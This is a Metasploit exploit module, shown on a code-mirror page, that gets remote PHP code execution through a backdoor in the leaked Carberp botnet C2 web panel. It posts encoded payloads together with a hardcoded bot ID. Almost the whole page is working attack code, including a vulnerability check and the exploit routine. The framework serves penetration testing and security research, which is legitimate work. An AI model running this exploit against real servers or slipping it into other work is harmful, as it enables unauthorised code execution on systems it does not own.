Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/carberp_backdoor_exec.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Carberp Web Panel C2 Backdoor Remote PHP Code Execution',

16
        'Description' => %q{

17
          This module exploits backdoors that can be found all over the leaked

18
          source code of the Carberp botnet C2 Web Panel.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [

22
          'bwall(Brian Wallace) <bwallace[at]cylance.com>', # msf module

23
          'connection(Luis Santana) <hacktalkblog[at]gmail.com>', # exploit reporting

24
          'Steven K <xylitol[at]malwareint[d0t]com>' # discovery and reporting

25
        ],

26
        'References' => [

27
          ['URL', 'http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html']

28
        ],

29
        'Privileged' => false,

30
        'Payload' => {

31
          'Keys' => ['php'],

32
          'Space' => 10000,

33
          'DisableNops' => true

34
        },

35
        'Platform' => ['php'],

36
        'Arch' => ARCH_PHP,

37
        'Targets' => [

38
          ['carberp', {}]

39
        ],

40
        'DisclosureDate' => '2013-06-28',

41
        'DefaultTarget' => 0,

42
        'Notes' => {

43
          'Reliability' => UNKNOWN_RELIABILITY,

44
          'Stability' => UNKNOWN_STABILITY,

45
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

46
        }

47
      )

48
    )

49


50
    register_options(

51
      [

52
        OptString.new('TARGETURI', [true, "The path to the backdoor, often just index.php", "/index.php"]),

53
        OptString.new('BOTID', [true, 'Hardcoded backdoor bot ID that can run PHP eval', 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV']),

54
      ]

55
    )

56
  end

57


58
  def check

59
    confirm_string = rand_text_alpha(8)

60
    cmd = "echo '#{confirm_string}';"

61
    shell = http_send_command(cmd)

62
    check_code = Exploit::CheckCode::Safe

63


64
    if shell and shell.body.include?(confirm_string)

65
      check_code = Exploit::CheckCode::Vulnerable

66
    end

67


68
    check_code

69
  end

70


71
  def http_send_command(cmd)

72
    uri = normalize_uri(target_uri.path.to_s)

73
    request_parameters = {

74
      'method'	=> 'POST',

75
      'uri'	=> uri,

76
      'vars_post'	=>

77
        {

78
          'id' => datastore['BOTID'],

79
          "data" => Rex::Text.encode_base64(cmd.unpack('H*'))

80
        }

81
    }

82
    res = send_request_cgi(request_parameters)

83


84
    res

85
  end

86


87
  def exploit

88
    http_send_command(payload.encoded)

89
  end

90
end

91


92